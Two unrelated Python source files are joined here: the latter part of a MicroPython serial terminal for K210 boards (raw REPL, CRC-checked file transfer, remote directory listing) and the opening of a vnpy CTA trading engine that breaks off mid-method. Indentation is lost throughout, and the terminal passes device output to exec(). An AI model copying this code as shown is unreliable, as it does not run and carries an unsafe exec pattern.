self.BAUDRATE = baudrate
self.ESCAPECHAR = "\033"
self.VERSION = "5.1.3"
self.ShutdownReceiver = False
self.ReceiverToStdout = True
self.DefaultTimeout = 0.1
self.width, self.height = shutil.get_terminal_size()
self.colors = clr;
if clr is True:
self.TCLR = dict(
NORMAL = '\033[0m',
RED = '\033[1;31m',
BLUE = '\033[1;34m',
YELLOW = '\033[1;33m',
WHITE = '\033[1;37m'
)
else:
self.TCLR = dict(
NORMAL = '',
RED = '',
BLUE = '',
YELLOW = '',
WHITE = ''
)
print("\n"+self.TCLR['RED']+"--[ "+self.TCLR['BLUE']+"MicroPython terminal "+self.TCLR['RED']+" ver. "+self.TCLR['BLUE']+self.VERSION + self.TCLR['RED']+" ]-- "+self.TCLR['NORMAL'])
print(self.TCLR['RED']+"--[ "+self.TCLR['BLUE']+"Press ESC twice for command mode"+self.TCLR['RED']+" ]-- "+self.TCLR['NORMAL']+"\n")
# Open remote terminal device
try:
self.uart = serial.Serial(
port = self.DEVICE,
baudrate= self.BAUDRATE,
bytesize= serial.EIGHTBITS,
parity = serial.PARITY_NONE,
stopbits= serial.STOPBITS_ONE,
timeout = self.DefaultTimeout,
xonxoff = 0,
rtscts = 0,
interCharTimeout=None
)
if rst:
self.uart.dtr = False
time.sleep(0.1)
self.uart.dtr = True
else:
self.uart.write(b'\r\n')
except Exception as e:
raise Exception(self.TCLR['RED']+"Accessing "+self.TCLR['WHITE'] + self.DEVICE + " "+self.TCLR['RED']+"failed\r\n"+self.TCLR['WHITE']+"PyTerm exit"+self.TCLR['NORMAL']+"\r\n")
# Setup local terminal
self.stdinfd = sys.stdin.fileno()
self.oldstdinsettings = termios.tcgetattr(self.stdinfd)
tty.setraw(self.stdinfd) # from now on, end-line must be "\r\n"
# Start receiver thread
self.ReceiverThread = Thread(target=self.ReceiveData, args=(self.uart, False))
self.ReceiverThread.start()
# this is the main loop of this software
try:
self.HandleUnbufferedUserInput();
except Exception as e:
print("\r\n"+self.TCLR['RED']+"Error: failed with the following exception:"+self.TCLR['NORMAL']+"\r\n")
print(e, "\r\n")
# Shutdown receiver thread
self.ShutdownReceiver = True
if self.ReceiverThread.is_alive():
self.ReceiverThread.join()
# Clean up everything
termios.tcsetattr(self.stdinfd, termios.TCSADRAIN, self.oldstdinsettings)
self.uart.close()
#----------------------
def clear_to_eol(self):
sys.stdout.write("\x1b[0K")
sys.stdout.flush()
#-------------------
def get_input(self): ## read from interface/keyboard one byte each and match against function keys
while True:
in_buffer = sys.stdin.read(1)
if in_buffer == '\x1b': ## starting with ESC, must be fct
while True:
in_buffer += sys.stdin.read(1)
c = in_buffer[-1]
if c == '~' or (c.isalpha() and c != 'O'):
break
if in_buffer in self.KEYMAP:
c = self.KEYMAP[in_buffer]
return c, None
elif ord(in_buffer[0]) >= 32:
return KEY_NONE, in_buffer
# Line editor
#------------------------------------------------
def line_edit(self, prompt, prompt_len, default):
# Write a message and move cursor back
push_msg = lambda msg: sys.stdout.write(msg + "\b" * len(msg))
sys.stdout.write(prompt)
sys.stdout.write(default)
sys.stdout.flush()
self.clear_to_eol()
res = default
pos = len(res)
while True:
key, char = self.get_input() ## Get Char of Fct.
if key == KEY_NONE: ## char to be inserted
if (prompt_len + len(res)) < (self.width - 2):
res = res[:pos] + char + res[pos:]
sys.stdout.write(res[pos])
sys.stdout.flush()
pos += len(char)
push_msg(res[pos:]) ## update tail
sys.stdout.flush()
elif key in (KEY_ENTER, KEY_TAB): ## Finis
return res, len(res)
elif key in (KEY_QUIT, KEY_DUP): ## Abort
return None, len(res)
elif key == KEY_LEFT:
if pos > 0:
sys.stdout.write("\b")
sys.stdout.flush()
pos -= 1
elif key == KEY_RIGHT:
if pos < len(res):
sys.stdout.write(res[pos])
sys.stdout.flush()
pos += 1
elif key == KEY_HOME:
sys.stdout.write("\b" * pos)
sys.stdout.flush()
pos = 0
elif key == KEY_END:
sys.stdout.write(res[pos:])
sys.stdout.flush()
pos = len(res)
elif key == KEY_DELETE: ## Delete
if pos < len(res):
res = res[:pos] + res[pos+1:]
push_msg(res[pos:] + ' ') ## update tail
sys.stdout.flush()
elif key == KEY_BACKSPACE: ## Backspace
if pos > 0:
res = res[:pos-1] + res[pos:]
sys.stdout.write("\b")
sys.stdout.flush()
pos -= 1
push_msg(res[pos:] + ' ') ## update tail
sys.stdout.flush()
#-----------------------------------------
def ReceiveData(self, uart, binary=False):
data = ""
last_char = '?'
while not self.ShutdownReceiver:
if not self.ReceiverToStdout:
time.sleep(0.01);
continue
try:
data = self.uart.read(self.uart.inWaiting())
except:
return
if data:
try:
string = data.decode("utf-8")
ostr = ""
for c in string:
if ord(c) != 4:
if (c == '\n') and (last_char != '\r'):
ostr = ostr + '\r'
last_char = c
ostr = ostr + str(c)
else:
ostr = ostr + "[{}]".format(hex(ord(c)))
except UnicodeDecodeError:
string = "[" + str(data) + "]"
ostr = string
sys.stdout.write(ostr)
sys.stdout.flush()
time.sleep(0.01);
#---------------------
def crc_16(self, buf):
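# CRC-16/CCITT-FALSE: polynomial 0x1021, initial value 0xFFFF, no final XOR or reflection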
crc = 0xFFFF
for c in buf:
crc = (crc ^ (c << 8)) & 0xFFFF
for i in range(8):
if (crc & 0x8000):
crc = ((crc << 1) & 0xFFFF) ^ 0x1021
else:
crc = (crc << 1) & 0xFFFF
return crc
#-----------------------------------------
def EnterRawREPL(self, imprt, cmd, bdr=0):
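# MicroPython raw REPL protocol: Ctrl-A (0x01) enters raw mode, Ctrl-D (0x04) executes the buffered input, Ctrl-B (0x02) exits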
self.ReceiverToStdout = False
time.sleep(0.1)
dummy = self.uart.read()
self.uart.timeout = 4
# enter raw REPL
self.uart.write(b'\x01')
resp = self.uart.read(28)
if resp == b'\r\nraw REPL; CTRL-B to exit\r\n':
#print("In Raw REPL", end="\r\n")
time.sleep(0.1)
self.uart.write(imprt)
self.uart.write(cmd)
self.uart.write(b'\x04') # Execute
time.sleep(0.1)
if bdr > 0:
print("baudrate changed to {}".format(bdr), end="\r\n")
self.uart.baudrate = bdr
time.sleep(0.1)
return True
print("\r\nerror waiting for Raw REPL", end="\r\n")
self.uart.timeout = self.DefaultTimeout
self.ReceiverToStdout = True  # re-enable terminal echo here, since callers skip ExitRawREPL when entering raw REPL fails
return False
#---------------------
def ExitRawREPL(self):
# exit raw REPL
self.uart.timeout = self.DefaultTimeout
tmo = 10
while True:
bb = self.uart.read(1)
if bb == b'\04':
#print("Confirmation received ({})".format(tmo), end="\r\n")
pass
elif bb == b'>':
#print("MPy prompt received ({})".format(tmo), end="\r\n")
break
tmo -= 1
if tmo == 0:
print("\r\nExit Raw REPL: timeout", end="\r\n")
break
self.uart.write(b'\x02') # Exit RawREPL
time.sleep(0.1)
tmo = 0
bb = self.uart.read(1)
while len(bb) > 0:
tmo += 1
bb = self.uart.read(1)
self.ReceiverToStdout = True
#print("Exit Raw REPL ({})".format(tmo), end="\r\n")
#-------------------------------------------------
def SendFileToDevice(self, src_fname, dest_fname):
try:
filesize = os.path.getsize(src_fname)
src_file = open(src_fname, 'rb')
send_cmd = "os.get_file('{}', {})\r\n".format(dest_fname, str(filesize))
except:
print("Error opening file", end="\r\n")
return
print("Sending local file "+self.TCLR['BLUE']+src_fname+self.TCLR['NORMAL']+" to "+self.TCLR['BLUE']+dest_fname+self.TCLR['NORMAL']+"\r\n", end="\r\n")
if not self.EnterRawREPL(b'import os\r\n', bytes(send_cmd.encode('utf-8'))):
return
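# remote acknowledge bytes used by the transfer protocol: 0x06 = OK / send next block, 0x07 = resend last block, 0x08-0x0A = abort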
ack = b'\x00'
while ack != b'\x06':
ack = self.uart.read(1)
if len(ack) == 0:
break
try:
if len(ack) == 0:
src_file.close()
print("timeout waiting for device acknowledge", end="\r\n")
self.ExitRawREPL()
return
start_time = time.time()
bytes_remaining = filesize
while bytes_remaining > 0:
read_size = min(bytes_remaining, 1024)
buf = src_file.read(read_size)
crc = self.crc_16(buf)
bcrc = bytes([crc >> 8, crc & 0xFF])
buff = b''.join([buf,bcrc])
bytes_remaining -= read_size
# Wait for ack from remote
if ack == b'\x00':
ack = self.uart.read(1)
if ack == b'\x07' or ack == b'\x06':
time.sleep(0.01)
self.uart.write(buff)
if ack == b'\x06':
sys.stdout.write("\r--> {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
else:
sys.stdout.write("\r-R> {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
elif ack == b'\x08' or ack == b'\x09' or ack == b'\x0A':
if bytes_remaining > 0:
print("\r\nabort requested from remote [{}]".format(ack[0]), end="\r\n")
break
else:
if bytes_remaining > 0:
print("\r\ntimed out or error in sending file to remote [{}]".format(ack), end="\r\n")
break
ack = b'\x00'
except Exception as e:
print("\r\nexception while sending file to remote ({})".format(e), end="\r\n")
src_file.close()
print("", end="\r\n")
if bytes_remaining <= 0:
end_time = time.time()
print("OK, took "+self.TCLR['BLUE'] + "%.3f" % (end_time - start_time) + self.TCLR['NORMAL']+" seconds, " + self.TCLR['BLUE'] + "%.3f" % ((filesize / (end_time - start_time)) / 1024) + self.TCLR['NORMAL']+" KB/s", end="\r\n")
self.ExitRawREPL()
#------------------------------------------------------
def ReceiveFileFromDevice(self, src_fname, dest_fname):
try:
dst_file = open(dest_fname, 'wb')
recv_cmd = "os.send_file('{}', 0)\r\n".format(src_fname)
except:
print("Error opening file", end="\r\n")
return
print("Receiving remote file "+self.TCLR['BLUE']+src_fname+self.TCLR['NORMAL']+" to "+self.TCLR['BLUE']+dest_fname+self.TCLR['NORMAL']+"\r\n", end="\r\n")
if not self.EnterRawREPL(b'import os\r\n', bytes(recv_cmd.encode('utf-8'))):
return
ack = b'\x00'
while ack != b'\x06':
ack = self.uart.read(1)
if len(ack) == 0:
break
if len(ack) == 0:
print("timeout waiting for file", end="\r\n")
dst_file.close()
self.ExitRawREPL()
return
# receive filesize first
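# the 8-byte size block is the 0x06 ack just read, a '[' marker (0x5B), the 4-byte little-endian file size, and a 2-byte big-endian CRC-16 over the first six bytes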
fsblock_ok = False
fs_bufr = self.uart.read(7)
if len(fs_bufr) == 7:
if fs_bufr[0] == 0x5B:
fs_buf = b'\x06' + fs_bufr
# check crc (last 2 bytes received)
crc = self.crc_16(fs_buf[0:6])
rcrc = (fs_buf[6] << 8) + fs_buf[7]
if crc == rcrc:
fsblock_ok = True
if fsblock_ok == False:
self.uart.write(b'\x08') # ASCII ACK is 0x08, abort
print("Error receiving file size", end="\r\n")
dst_file.close()
self.ExitRawREPL()
return
filesize = (fs_buf[5] << 24) + (fs_buf[4] << 16) + (fs_buf[3] << 8) + fs_buf[2]
self.uart.write(b'\x06') # ASCII ACK is 0x06
try:
start_time = time.time()
bytes_remaining = filesize
ntry = 3
while bytes_remaining > 0:
read_size = min(bytes_remaining, 1024)
while ntry > 0:
read_buf = self.uart.read(read_size+2)
if len(read_buf) != read_size+2:
print("\r\nwrong block size received: {}, expected {} [{}]".format(len(read_buf), read_size+2, read_buf), end="\r\n")
ntry = 0
continue
# check for abort block (all bytes 0x5A)
cc = True
for idx in range(read_size+2):
if read_buf[idx] != 0x5A:
cc = False
break
if cc:
#abort block received
print("\r\nabort requested from remote", end="\r\n")
ntry = 0
continue
# check crc (last 2 bytes received)
bcrc = read_buf[-2:]
rcrc = (bcrc[0] << 8) + bcrc[1]
crc = self.crc_16(read_buf[0:-2])
if crc == rcrc:
dst_file.write(read_buf[0:-2])
# Send an ack to the remote as a form of flow control
sys.stdout.write("\r<<< {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
self.uart.write(b'\x06') # ASCII ACK is 0x06
break
else:
sys.stdout.write("\r<R< {0:.2f}%".format((filesize-bytes_remaining) / filesize * 100))
sys.stdout.flush()
self.uart.write(b'\x07') # ASCII ACK is 0x07, repeat
ntry -= 1
if ntry == 0:
print("\r\ntimed out or error in receiving file from remote", end="\r\n")
self.uart.write(b'\x08') # ASCII ACK is 0x08, abort
bytes_remaining = 0
continue
bytes_remaining -= read_size
if ntry > 0:
sys.stdout.write("\r<<< {0:.2f}%\n".format((filesize-bytes_remaining) / filesize * 100))
except Exception as e:
print("\r\nexception while receiving file from remote ({})".format(e), end="\r\n")
print("", end="\r\n")
if bytes_remaining <= 0:
end_time = time.time()
print("OK, took "+self.TCLR['BLUE']+"%.3f" % (end_time - start_time) + self.TCLR['NORMAL']+" seconds, "+self.TCLR['BLUE']+"%.3f" % ((filesize / (end_time - start_time)) / 1024)+self.TCLR['NORMAL']+" KB/s", end="\r\n")
dst_file.close()
self.ExitRawREPL()
#------------------
def SyncTime(self):
now = time.localtime(time.time())
tz = int(time.strftime("%z", time.localtime())) // 100
tt = str((now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec, 0, 0))
cmd = "_ = time.mktime({}, tz={}, setrtc=True)\r\n".format(tt, tz)
if not self.EnterRawREPL(b'import time\r\n', bytes(cmd.encode('utf-8'))):
return
self.ExitRawREPL()
#-----------------------------
def SetBaudrate(self, bdrate):
cmd = "print(machine.repl_baudrate({}))\r\n".format(bdrate)
if not self.EnterRawREPL(b'import machine\r\n', bytes(cmd.encode('utf-8')), bdr=bdrate):
return
time.sleep(0.5)
self.ExitRawREPL()
#--------------------------------------------------
def ReadDirFromRemote(self, remote_dir, short=True):
cmd = "try:\r\n print(os.listdirex('{}', {}))\r\nexcept:\r\n print('[]')\r\n".format(remote_dir, str(short))
if not self.EnterRawREPL(b'import os\r\n', bytes(cmd.encode('utf-8'))):
return
response = ""
rdb = b'\x00'
while rdb != b'\x04':
rdb = self.uart.read(1)
if len(rdb) == 0:
break
if rdb == b'\x04':
break
response = response + chr(rdb[0])
self.ExitRawREPL()
_locals = locals()
dirlist = []
if response[:3] == ">OK":
response = response[3:]
if len(response) >= 2:
response = response.strip('\r\n')
response = "dirlist = " + response
try:
exec(response, globals(), _locals)
dirlist = _locals['dirlist']
except:
pass
return dirlist
#----------------------
def Get2ndEscape(self):
char = sys.stdin.read(1)
if char == self.ESCAPECHAR:
return True
elif char == "[":
self.uart.write("\033[".encode("utf-8"))
return False
data = char.encode("utf-8")
self.uart.write(data)
return False
#-----------------------------------
def HandleUnbufferedUserInput(self):
char = ""
while True:
char = sys.stdin.read(1)
if char == self.ESCAPECHAR:
if self.Get2ndEscape():
prompt = self.TCLR['RED']+"--["+self.TCLR['BLUE']+"mpTerm command: "+self.TCLR['NORMAL']
print("\r\n")
command, cmd_len = self.line_edit(prompt, 19, '')
if command is None:
if self.colors is True:
print("\r{}".format(prompt) + self.TCLR['WHITE']+"aborted"+self.TCLR['NORMAL']+"\033[0K", end="\r\n")
else:
cmd_blank = " "*cmd_len
print("\r{}".format(prompt) + self.TCLR['WHITE']+"aborted"+self.TCLR['NORMAL']+cmd_blank, end="\r\n")
elif command == "exit":
print("\r\n"+self.TCLR['BLUE']+" Exit PyTerm "+self.TCLR['RED']+"]--"+self.TCLR['NORMAL']+"\r\n", end="")
break
elif command == "version":
sys.stdout.write("\r\n")
sys.stdout.flush()
print("Version: " + self.VERSION, end="\r\n")
elif command[0:5] == "send ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
sys.stdout.write("\r\n")
self.SendFileToDevice(cmd[1], cmd[2])
elif len(cmd) == 2:
# send to '/flash', same name as source
fname = cmd[1].split('/')
if len(fname) > 0:
sys.stdout.write("\r\n")
self.SendFileToDevice(cmd[1], "/flash/" + fname[len(fname)-1])
else:
print("\r\nWrong command arguments", end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:8] == "senddir ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if os.path.isdir(cmd[1]):
ldir = cmd[1].rstrip('/') + '/'
rdir = cmd[2].rstrip('/') + '/'
sys.stdout.write("\r\n")
for f in os.listdir(cmd[1]):
if os.path.isfile(ldir + f):
self.SendFileToDevice(ldir + f, rdir + f)
time.sleep(0.5)
else:
print("\r\n{} is not a directory".format(cmd[1]), end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:5] == "recv ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if os.path.isdir(cmd[2]):
dirname = cmd[2].rstrip('/') + '/'
fname = cmd[1].split('/')
if len(fname) > 0:
fname = dirname + fname[len(fname)-1]
else:
print("\r\nWrong command arguments", end="\r\n")
else:
fname = cmd[2]
sys.stdout.write("\r\n")
self.ReceiveFileFromDevice(cmd[1], fname)
elif len(cmd) == 2:
# receive to current directory, same name as source
fname = cmd[1].split('/')
if len(fname) > 0:
sys.stdout.write("\r\n")
self.ReceiveFileFromDevice(cmd[1], fname[len(fname)-1])
else:
print("\r\nWrong command arguments", end="\r\n")
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:8] == "recvdir ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 3:
if not os.path.isdir(cmd[2]):
os.mkdir(cmd[2])
dirlist = self.ReadDirFromRemote(cmd[1])
if len(dirlist) > 0:
rdir = cmd[1].rstrip('/') + '/'
ldir = cmd[2].rstrip('/') + '/'
sys.stdout.write("\r\n")
for f in dirlist:
self.ReceiveFileFromDevice(rdir + f, ldir + f)
time.sleep(0.5)
else:
print("\r\nNo files to receive\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:3] == "ls ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if (len(cmd) == 2) or (len(cmd) == 3):
short_list = False
if (len(cmd) == 3):
if cmd[2] == "short":
short_list = True
rdir = cmd[1].rstrip('/') + '/'
dirlist = self.ReadDirFromRemote(rdir, short=short_list)
if len(dirlist) > 0:
dirlist.sort(key=lambda x: (not x[1], x[0].lower()))
sys.stdout.write("\r\n\r\nList of directory '{}':\r\n".format(rdir))
sys.stdout.write("{}\r\n".format("".rjust(21+len(rdir), '-')))
if short_list is False:
max_name_len = 0
max_size_len = 0
for f in dirlist:
if len(f[0]) > max_name_len:
max_name_len = len(f[0])
if len(str(f[2])) > max_size_len:
max_size_len = len(str(f[2]))
max_name_len += 1
max_size_len += 1
for f in dirlist:
print("{} {} {} {}".format(f[0].rjust(max_name_len), " <dir>" if f[1] else "<file>", str(f[2]).rjust(max_size_len), datetime.utcfromtimestamp(f[3]).strftime('%Y-%m-%d %H:%M:%S')), end="\r\n")
else:
dirlist.sort(key=lambda name: name.lower())
for f in dirlist:
print("{}".format(f), end="\r\n")
else:
print("\r\nNo files to list\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:8] == "lslocal ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if (len(cmd) == 2) or (len(cmd) == 3):
short_list = False
if (len(cmd) == 3):
if cmd[2] == "short":
short_list = True
rdir = cmd[1]
lpath = os.path.abspath(rdir)
dirlst = os.listdir(rdir)
if len(dirlst) > 0:
sys.stdout.write("\r\n\r\nList of directory '{}':\r\n".format(lpath))
sys.stdout.write("{}\r\n".format("".rjust(21+len(lpath), '-')))
if short_list is False:
dirlist = []
for f in dirlst:
file_path = os.path.abspath(lpath + "/" + f)
st = os.stat(file_path)
dirlist.append((f, (st[0] & 0x8000) == 0, st[6], st[8]))
dirlist.sort(key=lambda x: (not x[1], x[0].lower()))
max_name_len = 0
max_size_len = 0
for f in dirlist:
if len(f[0]) > max_name_len:
max_name_len = len(f[0])
if len(str(f[2])) > max_size_len:
max_size_len = len(str(f[2]))
max_name_len += 1
max_size_len += 1
for f in dirlist:
print("{} {} {} {}".format(f[0].rjust(max_name_len), " <dir>" if f[1] else "<file>", str(f[2]).rjust(max_size_len), datetime.utcfromtimestamp(f[3]).strftime('%Y-%m-%d %H:%M:%S')), end="\r\n")
else:
dirlst.sort(key=lambda name: name.lower())
for f in dirlst:
print("{}".format(f), end="\r\n")
else:
print("\r\nNo files to list\r\n{}\r\n".format(dirlist))
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command[0:9] == "baudrate ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 2:
baudrate = int(cmd[1])
print("\r\nbautrate set to {}\r\n".format(baudrate), end="\r\n")
self.uart.baudrate = baudrate
else:
print("\r\nWrong command arguments", end="\r\n")
except:
print("\r\nError", end="\r\n")
elif command[0:13] == "set_baudrate ":
try:
cmd = re.sub(' +', ' ', command.strip()).split(' ')
if len(cmd) == 2:
baudrate = int(cmd[1])
print("\r\nset device and terminal bautrate to {}\r\n".format(baudrate), end="\r\n")
self.SetBaudrate(baudrate)
else:
print("\r\nWrong command arguments", end="\r\n")
except Exception as e:
print("\r\nError", e, end="\r\n")
elif command == "synctime":
try:
sys.stdout.write("\r\n")
self.SyncTime()
print("OK.", end="\r\n")
except:
print("Error", end="\r\n")
else:
if self.colors is True:
print("\r{}".format(prompt)+self.TCLR['RED']+"unknown command !"+self.TCLR['NORMAL']+"\033[0K"+"\r\n", end="\r\n")
else:
cmd_blank = " "*cmd_len
print("\r{}".format(prompt)+self.TCLR['RED']+"unknown command !"+self.TCLR['NORMAL']+cmd_blank+"\r\n", end="\r\n")
print(self.TCLR['WHITE']+"Available commands:"+self.TCLR['NORMAL'], end="\r\n")
print(self.TCLR['BLUE'] +" exit "+self.TCLR['NORMAL']+" - exit the terminal", end="\r\n")
print(self.TCLR['BLUE'] +" version "+self.TCLR['NORMAL']+" - print version info", end="\r\n")
print(self.TCLR['BLUE'] +" synctime "+self.TCLR['NORMAL']+" - synchronize device time to the PC time", end="\r\n")
print(self.TCLR['BLUE'] +" baudrate "+self.TCLR['WHITE']+"bdr "+self.TCLR['NORMAL']+" - set terminal baudrate", end="\r\n")
print(self.TCLR['BLUE'] +"set_baudrate "+self.TCLR['WHITE']+"bdr "+self.TCLR['NORMAL']+" - set device and terminal baudrate", end="\r\n")
print(self.TCLR['BLUE'] +" send "+self.TCLR['WHITE']+"lfile rfile"+self.TCLR['NORMAL']+" - send file to device", end="\r\n")
print(self.TCLR['BLUE'] +" recv "+self.TCLR['WHITE']+"rfile lfile"+self.TCLR['NORMAL']+" - receive file from device", end="\r\n")
print(self.TCLR['BLUE'] +" senddir "+self.TCLR['WHITE']+"ldir rdir "+self.TCLR['NORMAL']+" - send all files from local directory to device's directory", end="\r\n")
print(self.TCLR['BLUE'] +" recvdir "+self.TCLR['WHITE']+"rdir ldir "+self.TCLR['NORMAL']+" - receive all files from device's directory to local directory", end="\r\n")
print(self.TCLR['BLUE'] +" ls "+self.TCLR['WHITE']+"rdir [short]"+self.TCLR['NORMAL']+" - list remote directory, if 'short' is given, only file names are printed", end="\r\n")
print(self.TCLR['BLUE'] +" lslocal "+self.TCLR['WHITE']+"rdir [short]"+self.TCLR['NORMAL']+" - list local directory, if 'short' is given, only file names are printed", end="\r\n")
print(self.TCLR['YELLOW']+" Enter "+self.TCLR['NORMAL']+" - accept and execute command", end="\r\n")
print(self.TCLR['YELLOW']+" Ctrl-Q "+self.TCLR['NORMAL']+" - aborts command mode\r", end="\r\n")
print(self.TCLR['BLUE']+"back to device "+self.TCLR['RED']+"]--"+self.TCLR['NORMAL']+"\r\n", end="")
self.uart.write(b'\r\n')
else:
data = char.encode("utf-8")
self.uart.write(data)
#=========================
if __name__ == '__main__':
cli = argparse.ArgumentParser(
description="Serial ternimal optimized for K210 MicroPython.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
cli.add_argument("-b", "--baudrate", default=115200, type=int, action="store",
help="The baudrate used for the communication.")
cli.add_argument("-r", "--reset", default=False, type=str, action="store",
help="Reset the device on start")
cli.add_argument("-c", "--color", default=True, type=str, action="store",
help="Use ANSI colors or not")
cli.add_argument("-d", "--device", default='/dev/ttyUSB0', type=str, action="store",
help="Path to the serial communication device.")
args = cli.parse_args()
trm = PyTerm(baudrate=args.baudrate, device=args.device, rst=args.reset, clr=args.color)
|
engine.py
|
""""""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
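# How the mapping above is used: when the gateway reports a status for a
# server-side stop order, process_order_event below translates it into the
# stop-order lifecycle (WAITING -> TRIGGERED / CANCELLED) before notifying the
# strategy via on_stop_order.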
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "cta_strategy_setting.json"
data_filename = "cta_strategy_data.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
        self.classes = {}  # class_name: strategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
self.stop_order_count = 0 # for generating stop_orderid
self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.rq_client = None
self.rq_symbols = set()
self.offset_converter = OffsetConverter(self.main_engine)
def init_engine(self):
"""
"""
self.init_rqdata()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
pass
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
def init_rqdata(self):
"""
Init RQData client.
"""
result = rqdata_client.init()
if result:
self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
"""
Query bar data from RQData.
"""
data = rqdata_client.query_bar(
symbol, exchange, interval, start, end
)
return data
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP[order.status],
vt_orderid=order.vt_orderid,
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
self.put_strategy_event(strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def check_stop_order(self, tick: TickData):
""""""
for stop_order in list(self.stop_orders.values()):
if stop_order.vt_symbol != tick.vt_symbol:
continue
long_triggered = (
stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
)
short_triggered = (
stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
)
if long_triggered or short_triggered:
strategy = self.strategies[stop_order.strategy_name]
                # To get executed immediately after stop order is
# triggered, use limit price if available, otherwise
# use ask_price_5 or bid_price_5
if stop_order.direction == Direction.LONG:
if tick.limit_up:
price = tick.limit_up
else:
price = tick.ask_price_5
else:
if tick.limit_down:
price = tick.limit_down
else:
price = tick.bid_price_5
contract = self.main_engine.get_contract(stop_order.vt_symbol)
vt_orderids = self.send_limit_order(
strategy,
contract,
stop_order.direction,
stop_order.offset,
price,
stop_order.volume,
stop_order.lock
)
# Update stop order status if placed successfully
if vt_orderids:
# Remove from relation map.
self.stop_orders.pop(stop_order.stop_orderid)
